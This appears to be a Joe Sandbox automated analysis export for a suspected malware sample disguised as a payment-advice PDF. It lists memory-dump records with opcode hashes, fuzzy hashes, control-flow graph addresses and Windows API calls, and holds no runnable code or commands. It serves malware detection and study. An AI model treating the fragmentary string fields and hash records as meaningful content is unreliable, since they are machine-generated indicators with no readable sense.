                                                                                                                                    • String ID: 0^H7
                                                                                                                                    • API String ID: 0-928007173
                                                                                                                                    • Opcode ID: 837e057f32a2a0208d57cbf01b1865b28abf5ac626b1cc559589e4c51cf81f59
                                                                                                                                    • Instruction ID: 714f525a7f36207a394cc94f93d5bbe52082fc3b238a77009bf8a19223673706
                                                                                                                                    • Opcode Fuzzy Hash: 837e057f32a2a0208d57cbf01b1865b28abf5ac626b1cc559589e4c51cf81f59
                                                                                                                                    • Instruction Fuzzy Hash: AAA182B4E012188FEB18CF6AD984B9DFBF2AF89300F14D1AAD508B7255DB345A85CF51
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0^H7
                                                                                                                                    • API String ID: 0-928007173
                                                                                                                                    • Opcode ID: f2881a1ae3515c99fc968aa14a4672967e2f45b78afa628e0b07f92631484d4f
                                                                                                                                    • Instruction ID: 287608706dd081bf8682bd2330d7cb0976d84414a693c84bcda0a14f347b5621
                                                                                                                                    • Opcode Fuzzy Hash: f2881a1ae3515c99fc968aa14a4672967e2f45b78afa628e0b07f92631484d4f
                                                                                                                                    • Instruction Fuzzy Hash: 138174B4E016288FEB58CF6AC944B99FBF2AF89300F14C5AAD40CB7255DB345A85CF51
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0^H7
                                                                                                                                    • API String ID: 0-928007173
                                                                                                                                    • Opcode ID: 7d3d54d7c2857946d1c170144ad2541ecef1d310e3b07a627656f9b75dd7aadd
                                                                                                                                    • Instruction ID: 97f9dda7f5c481662bacd50cff711aa6bb72ef6c3d5ce35df7a881a85474c553
                                                                                                                                    • Opcode Fuzzy Hash: 7d3d54d7c2857946d1c170144ad2541ecef1d310e3b07a627656f9b75dd7aadd
                                                                                                                                    • Instruction Fuzzy Hash: B77182B5E016188FEB68CF6AC944B99FBF2AF89300F14C1AAD40CB7255DB345A85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e948a7f9cf9b94e4002027f90db1e15f2eb3d8271e342b0510e11304c5277f84
                                                                                                                                    • Instruction ID: 1430fce43227bc8da69775e23864f62b908b610b8d19d34a91acbbe5c6a9eb42
                                                                                                                                    • Opcode Fuzzy Hash: e948a7f9cf9b94e4002027f90db1e15f2eb3d8271e342b0510e11304c5277f84
                                                                                                                                    • Instruction Fuzzy Hash: 6D72C274E012288FEB64DF69C980BDDBBB2BB49300F1495E9D408A7391DB34AE81DF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2a6b3ce92bfb6ebd6ea44c95d732f6e18308cb0d945e0768570c58b5ea766f55
                                                                                                                                    • Instruction ID: a9d783633e35b6f1322da3be209119bc8f1eeb34386f1b8665eede0b0df971e2
                                                                                                                                    • Opcode Fuzzy Hash: 2a6b3ce92bfb6ebd6ea44c95d732f6e18308cb0d945e0768570c58b5ea766f55
                                                                                                                                    • Instruction Fuzzy Hash: B6E1D174E01258CFEB54CFA5C984BDDBBB2AF89304F2081AAD418B7391DB355A86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d22718960cf26089e49a83c09f725a2c2878445fc6529156999b62fdbf59f764
                                                                                                                                    • Instruction ID: 8260e6b43fd9b4eac3b9ce0ce61069e5599c81c9dea11738f7ef271627517103
                                                                                                                                    • Opcode Fuzzy Hash: d22718960cf26089e49a83c09f725a2c2878445fc6529156999b62fdbf59f764
                                                                                                                                    • Instruction Fuzzy Hash: 54D1C274E01218CFDB54DFA5C994BDDBBB2BF88304F1080A9D419A7364DB35AA86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 429c9a2ba3bc42cfdad2ec66dfd2081b81367ec22e7ab526fdaff7a9f3bdb4b4
                                                                                                                                    • Instruction ID: 320fb59cd2c56a7797c5215d2d787269d5c17bc23bbc74782fd0710308dc3e31
                                                                                                                                    • Opcode Fuzzy Hash: 429c9a2ba3bc42cfdad2ec66dfd2081b81367ec22e7ab526fdaff7a9f3bdb4b4
                                                                                                                                    • Instruction Fuzzy Hash: 3FA10570D01208CFEB10DFA9C984BDDBBB1BF89314F209269E558A73A1DB74A985CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3962e9acb35284adad9be10b7f65c16cc0c12d21dca134afb4f30e508df57a12
                                                                                                                                    • Instruction ID: ca24e1a1104d135d2324a399c756f48828d2d6eade380c3d73db4352941d6957
                                                                                                                                    • Opcode Fuzzy Hash: 3962e9acb35284adad9be10b7f65c16cc0c12d21dca134afb4f30e508df57a12
                                                                                                                                    • Instruction Fuzzy Hash: 79A10670D01208CFDB10DFA9C5847DDBBB1BF89314F209269E518A73A1DB74A985CF55
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 34f46b1e9d85e8133062f05a32db774b800961f1ad72346b5e9482fa6329dfb2
                                                                                                                                    • Instruction ID: 4b830d088945778a2d38f1184a6128f70dd428d751c80252eac2af52656250ee
                                                                                                                                    • Opcode Fuzzy Hash: 34f46b1e9d85e8133062f05a32db774b800961f1ad72346b5e9482fa6329dfb2
                                                                                                                                    • Instruction Fuzzy Hash: 15910274D01248CFEB10DFA8C984BDCBBB1FF89314F209269E519A72A1DB74A981CF55
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4a57a6daaf84722802575300e379ebc25aedffb4454c39291df8e00d62fe9a5b
                                                                                                                                    • Instruction ID: b19605725d6d40fb5b7da80d9ea17034168d3435769a1e1390d93ca96a2506e1
                                                                                                                                    • Opcode Fuzzy Hash: 4a57a6daaf84722802575300e379ebc25aedffb4454c39291df8e00d62fe9a5b
                                                                                                                                    • Instruction Fuzzy Hash: A4810774E016088FDB08DFAAD95069DBBF2BF88310F24D529E414BB394EB355942CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bee1ec456f21729baaaad345a21294d7d9555f0291f485b8ebd8c23d52807cf4
                                                                                                                                    • Instruction ID: 1293c2f02206fbd6637b60f361a6b4a7634cd225cc36c93fe9380c1ef20bea30
                                                                                                                                    • Opcode Fuzzy Hash: bee1ec456f21729baaaad345a21294d7d9555f0291f485b8ebd8c23d52807cf4
                                                                                                                                    • Instruction Fuzzy Hash: F271C375D01268CFEB68DF66C9847DDBBB2BF89301F1094AAD408A7354DB356A82CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2961153208.0000000037A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37a50000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 11a6ebde4375a2e5b1af7690962941383a332cf95f8ffc62fce9404d1c0fa366
                                                                                                                                    • Instruction ID: ad1b26d13fae64ff74eecf8f5d37513f95805d8aca7ad16177cba075097352bd
                                                                                                                                    • Opcode Fuzzy Hash: 11a6ebde4375a2e5b1af7690962941383a332cf95f8ffc62fce9404d1c0fa366
                                                                                                                                    • Instruction Fuzzy Hash: E7611838A40219DFEB25DF64D950BADBBB6FB88300F1084A9D91977764DE329D82DF10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f3e158b383255b1e56ff41885e3f66f5e1eb883d155620ee9b819193b2842872
                                                                                                                                    • Instruction ID: 7426e77168300bac50703c5753c2a85f71f2398c07d96c7d8b38fb4f371d6c51
                                                                                                                                    • Opcode Fuzzy Hash: f3e158b383255b1e56ff41885e3f66f5e1eb883d155620ee9b819193b2842872
                                                                                                                                    • Instruction Fuzzy Hash: 1C4177B1E016188FEB58CF6BCD447C9FAF3AFC9200F04C5AAD54CA6265DB740A868F51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b5540ec3886c27d75fb4fdadd1b64501a7d6cc0f0b0bba187db318d3c838a689
                                                                                                                                    • Instruction ID: 054b7b16e47192fc7294d5441433d339c396d042e0cdb30b114e33ad17de6fd3
                                                                                                                                    • Opcode Fuzzy Hash: b5540ec3886c27d75fb4fdadd1b64501a7d6cc0f0b0bba187db318d3c838a689
                                                                                                                                    • Instruction Fuzzy Hash: 344169B1D016188FEB58CF6BCD457CAFAF3AFC8204F14C1AAD50CA6254DB744A868F51

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 913 37a50980-37a50a0f GetCurrentProcess 917 37a50a11-37a50a17 913->917 918 37a50a18-37a50a4c GetCurrentThread 913->918 917->918 919 37a50a55-37a50a89 GetCurrentProcess 918->919 920 37a50a4e-37a50a54 918->920 922 37a50a92-37a50aaa 919->922 923 37a50a8b-37a50a91 919->923 920->919 934 37a50aad call 37a50f31 922->934 935 37a50aad call 37a50b4f 922->935 923->922 926 37a50ab3-37a50ae2 GetCurrentThreadId 927 37a50ae4-37a50aea 926->927 928 37a50aeb-37a50b4d 926->928 927->928 934->926 935->926
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 37A509FE
                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 37A50A3B
                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 37A50A78
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 37A50AD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2961153208.0000000037A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37a50000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                    • Opcode ID: 3ac310f14df1cb179b85fd7921f33f936552b0320ba42ac9e3178798a9902a7f
                                                                                                                                    • Instruction ID: 772b09c9d655666e65003466c00ccf9d2c9c28368bd8f2d04e6dab94af82407c
                                                                                                                                    • Opcode Fuzzy Hash: 3ac310f14df1cb179b85fd7921f33f936552b0320ba42ac9e3178798a9902a7f
                                                                                                                                    • Instruction Fuzzy Hash: 915155B09006499FDB04CFA9C548BDEBBF1EF88310F20C469E469A7361DB35A984CF65

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 936 3752d548-3752d66d 955 3752d673-3752d6b9 936->955 956 3752d710-3752d741 936->956 961 3752d6c4-3752d70f 955->961 962 3752d6bb-3752d6bf 955->962 963 3752d747-3752d75e 956->963 962->961
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q$drH7$)N7
                                                                                                                                    • API String ID: 0-3684718874
                                                                                                                                    • Opcode ID: fe5867e12255e3a675627521ba9f2c4665aec0e8df38c637c525ab98373b8b50
                                                                                                                                    • Instruction ID: fa5ad49ff613fa89d084dabb9b2c46b7dd7bce87550b58befe0a9bc61e638321
                                                                                                                                    • Opcode Fuzzy Hash: fe5867e12255e3a675627521ba9f2c4665aec0e8df38c637c525ab98373b8b50
                                                                                                                                    • Instruction Fuzzy Hash: 86515370A002499FCB05EFA8D955ADEBBB2FF85300F108569E005BB366DB35AD46CF51

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1031 160b29-160b4a 1032 160b51-160ba6 call 1607b4 1031->1032 1033 160b4c 1031->1033 1041 160bab-160bae call 160ec8 1032->1041 1033->1032 1042 160bb4-160c7b call 1607b4 * 4 1041->1042 1063 160c86-160c94 1042->1063 1064 160c9d-160ca6 1063->1064 1065 160cae-160cc6 call 1617b8 1064->1065 1097 160cc9 call 1619b7 1065->1097 1098 160cc9 call 161a40 1065->1098 1099 160cc9 call 1619b8 1065->1099 1067 160ccf-160cd5 1100 160cd8 call 1619b7 1067->1100 1101 160cd8 call 161a40 1067->1101 1102 160cd8 call 162c60 1067->1102 1103 160cd8 call 1619b8 1067->1103 1104 160cd8 call 162c88 1067->1104 1068 160cde-160ce7 1105 160cea call 16324d 1068->1105 1106 160cea call 163168 1068->1106 1069 160cf0-160d05 1071 160d0e-160d1a call 164328 1069->1071 1072 160d20-160e88 1071->1072 1097->1067 1098->1067 1099->1067 1100->1068 1101->1068 1102->1068 1103->1068 1104->1068 1105->1069 1106->1069
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LR^q$(y4$(y4
                                                                                                                                    • API String ID: 0-2382973545
                                                                                                                                    • Opcode ID: 1593664dc98ffe3bd8925d789fe92a356ec2ab4c21b2bf561f4eeb0257abccc1
                                                                                                                                    • Instruction ID: 94e3c969a817eab0cb3cae6b1c9984f7db93c3a41c9f5804af46dbf652d573eb
                                                                                                                                    • Opcode Fuzzy Hash: 1593664dc98ffe3bd8925d789fe92a356ec2ab4c21b2bf561f4eeb0257abccc1
                                                                                                                                    • Instruction Fuzzy Hash: 2BA1C674A10209DFCB44EFA8E985A9DBBB2FB49305B104629E415BB365DF30AD47CF90

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1108 160b30-160b4a 1109 160b51-160cc6 call 1607b4 call 160ec8 call 1607b4 * 4 call 1617b8 1108->1109 1110 160b4c 1108->1110 1174 160cc9 call 1619b7 1109->1174 1175 160cc9 call 161a40 1109->1175 1176 160cc9 call 1619b8 1109->1176 1110->1109 1144 160ccf-160cd5 1177 160cd8 call 1619b7 1144->1177 1178 160cd8 call 161a40 1144->1178 1179 160cd8 call 162c60 1144->1179 1180 160cd8 call 1619b8 1144->1180 1181 160cd8 call 162c88 1144->1181 1145 160cde-160ce7 1182 160cea call 16324d 1145->1182 1183 160cea call 163168 1145->1183 1146 160cf0-160d1a call 164328 1149 160d20-160e88 1146->1149 1174->1144 1175->1144 1176->1144 1177->1145 1178->1145 1179->1145 1180->1145 1181->1145 1182->1146 1183->1146
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: LR^q$(y4$(y4
                                                                                                                                    • API String ID: 0-2382973545
                                                                                                                                    • Opcode ID: c9f5140e4fe395e0c8824bbe2217f925a422f9572e9d11d54186a38a000ff0ce
                                                                                                                                    • Instruction ID: 69b46c9aa0e1b558b56521bc1cdf83d094ec60895eb79403f5115d8463c6aca1
                                                                                                                                    • Opcode Fuzzy Hash: c9f5140e4fe395e0c8824bbe2217f925a422f9572e9d11d54186a38a000ff0ce
                                                                                                                                    • Instruction Fuzzy Hash: B4A1B674A10209DFCB44EFA8E985A9DBBB2FB48305B104629E415BB365DF30AD47CF90

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1231 37527920-37527941 1232 37527943 1231->1232 1233 37527948-3752797e 1231->1233 1232->1233 1236 37527987-375279ae 1233->1236 1238 375279b4-375279cc 1236->1238 1239 37527b3d-37527b46 1236->1239 1242 37527ae8-37527b03 1238->1242 1244 375279d1-37527ae7 1242->1244 1245 37527b09-37527b2d 1242->1245 1244->1242
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: <CH7$<CH7$<CH7
                                                                                                                                    • API String ID: 0-1554385541
                                                                                                                                    • Opcode ID: 9bfb64c80f3e7157f4d27ba17b32c60868c4e78c3c6c881a5928ac5909de9087
                                                                                                                                    • Instruction ID: a3985b8fdeccc075ec349bc2f3c1100df8e169f7c51138e2430d2531def3a9ca
                                                                                                                                    • Opcode Fuzzy Hash: 9bfb64c80f3e7157f4d27ba17b32c60868c4e78c3c6c881a5928ac5909de9087
                                                                                                                                    • Instruction Fuzzy Hash: 8951E174D01318DFDB14DFA5D954AAEBBB2BF88304F208529D809BB395DB356986CF40
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Hbq$Hbq
                                                                                                                                    • API String ID: 0-4258043069
                                                                                                                                    • Opcode ID: 5c31ab56e70824d558f6a7cad3f0d3eb6df4eea62ce9a3a3834d01b40e279226
                                                                                                                                    • Instruction ID: ce8f4ad0e1c21ac9fe3d377d5664b1e8fa0d823ab55f17c51cc00e213b295069
                                                                                                                                    • Opcode Fuzzy Hash: 5c31ab56e70824d558f6a7cad3f0d3eb6df4eea62ce9a3a3834d01b40e279226
                                                                                                                                    • Instruction Fuzzy Hash: CDB1DE303046518FDB199F38CCA4B6A7BE7AF89304F158569E846CB3A1CB34CD92DB91
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,bq$,bq
                                                                                                                                    • API String ID: 0-2699258169
                                                                                                                                    • Opcode ID: 134f4ab3ef74bc5ede1bed4d09251024912026297359a914d08578bd33fcbad2
                                                                                                                                    • Instruction ID: f98d6018884e8da98f707891adad4c4642683228fd10446de8e620b293e7f619
                                                                                                                                    • Opcode Fuzzy Hash: 134f4ab3ef74bc5ede1bed4d09251024912026297359a914d08578bd33fcbad2
                                                                                                                                    • Instruction Fuzzy Hash: 68816B34A009068FCB18CF69CC889AAB7B3BF88315F658169D416DB365DB31EC51CFA1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: <CH7$<CH7
                                                                                                                                    • API String ID: 0-2616750891
                                                                                                                                    • Opcode ID: 5974cbf419cbe58c5783d5bd8d83cd155df2d6cc6e251d965168152c51294c0e
                                                                                                                                    • Instruction ID: 96627287490da9116e85fd7b13f3b68161bc0b752d4bd3b016fe8e8a197e4ec6
                                                                                                                                    • Opcode Fuzzy Hash: 5974cbf419cbe58c5783d5bd8d83cd155df2d6cc6e251d965168152c51294c0e
                                                                                                                                    • Instruction Fuzzy Hash: DF21F370D02319DFEB08DFA5D4447EEBBB2AF89314F50882AE414BB280DB755A4ACF51
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933284571.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_160000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q
                                                                                                                                    • API String ID: 0-2697143702
                                                                                                                                    • Opcode ID: 1c6d6f046675f4e8050b6e409b319d00118b694a44c5be665ce4729cbdebcf9e
                                                                                                                                    • Instruction ID: 0c0ae61dd8d140a5be1b14eeada445b9fe0ec2ee33e232199e4d16816cbc0a7d
                                                                                                                                    • Opcode Fuzzy Hash: 1c6d6f046675f4e8050b6e409b319d00118b694a44c5be665ce4729cbdebcf9e
                                                                                                                                    • Instruction Fuzzy Hash: 08F0C2353402182FDB081AAA9C5497B7ACBEBCC3A0B048429F90AC7390DE72CC5283A1
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37A50222
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2961153208.0000000037A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37a50000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                    • Opcode ID: 3bd63a62dd5b8ed3e3abea7a9b688c08ac10f37554ee2c185ad5a9bb9def0d9b
                                                                                                                                    • Instruction ID: d47b7a8f3dfde70339fd1af14101566f9b893257070926acbcd7287053789e69
                                                                                                                                    • Opcode Fuzzy Hash: 3bd63a62dd5b8ed3e3abea7a9b688c08ac10f37554ee2c185ad5a9bb9def0d9b
                                                                                                                                    • Instruction Fuzzy Hash: B551C4B5D003099FDB14CFA9C984ADEFBB5FF48310F24812AE958AB210D7709985CF91
                                                                                                                                    APIs
                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37A50222
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2961153208.0000000037A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37a50000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                    • Opcode ID: 240e5e8df77a994f7febb245f1584c0366505bb464c900339a3e8b33bf744827
                                                                                                                                    • Instruction ID: 44ae4b77ac40925af2011df57744a4c1ea0fc6e3e1db7fee90ad14b9a59e9b8a
                                                                                                                                    • Opcode Fuzzy Hash: 240e5e8df77a994f7febb245f1584c0366505bb464c900339a3e8b33bf744827
                                                                                                                                    • Instruction Fuzzy Hash: BB41B2B5D003099FDB14CFA9C984ADEFBB5BF48310F24852AE818AB210D770A985CF91
                                                                                                                                    APIs
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 37A51E81
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2961153208.0000000037A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37a50000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CallProcWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2714655100-0
                                                                                                                                    • Opcode ID: b5182a96d3bb041004e4175bb9cecc96ac8d7311a4b5e56be976013ecf602743
